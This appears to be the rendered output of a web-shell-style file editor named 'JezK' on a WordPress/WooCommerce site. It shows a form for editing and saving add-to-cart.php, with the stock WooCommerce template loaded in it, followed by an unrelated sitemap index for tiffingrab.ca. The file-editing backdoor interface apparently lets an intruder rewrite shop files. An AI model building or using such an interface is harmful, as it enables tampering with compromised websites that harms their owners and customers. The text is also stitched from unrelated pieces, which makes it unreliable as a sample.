
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: add-to-cart.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Loop Add to Cart
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/loop/add-to-cart.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see         https://woocommerce.com/document/template-structure/
 * @package     WooCommerce\Templates
 * @version     9.2.0
 */

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit;
}

global $product;

$aria_describedby = isset( $args[&#039;aria-describedby_text&#039;] ) ? sprintf( &#039;aria-describedby=&quot;woocommerce_loop_add_to_cart_link_describedby_%s&quot;&#039;, esc_attr( $product-&gt;get_id() ) ) : &#039;&#039;;

echo apply_filters(
	&#039;woocommerce_loop_add_to_cart_link&#039;, // WPCS: XSS ok.
	sprintf(
		&#039;&lt;a href=&quot;%s&quot; %s data-quantity=&quot;%s&quot; class=&quot;%s&quot; %s&gt;%s&lt;/a&gt;&#039;,
		esc_url( $product-&gt;add_to_cart_url() ),
		$aria_describedby,
		esc_attr( isset( $args[&#039;quantity&#039;] ) ? $args[&#039;quantity&#039;] : 1 ),
		esc_attr( isset( $args[&#039;class&#039;] ) ? $args[&#039;class&#039;] : &#039;button&#039; ),
		isset( $args[&#039;attributes&#039;] ) ? wc_implode_html_attributes( $args[&#039;attributes&#039;] ) : &#039;&#039;,
		esc_html( $product-&gt;add_to_cart_text() )
	),
	$product,
	$args
);
?&gt;
&lt;?php if ( isset( $args[&#039;aria-describedby_text&#039;] ) ) : ?&gt;
	&lt;span id=&quot;woocommerce_loop_add_to_cart_link_describedby_&lt;?php echo esc_attr( $product-&gt;get_id() ); ?&gt;&quot; class=&quot;screen-reader-text&quot;&gt;
		&lt;?php echo esc_html( $args[&#039;aria-describedby_text&#039;] ); ?&gt;
	&lt;/span&gt;
&lt;?php endif; ?&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://tiffingrab.ca/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
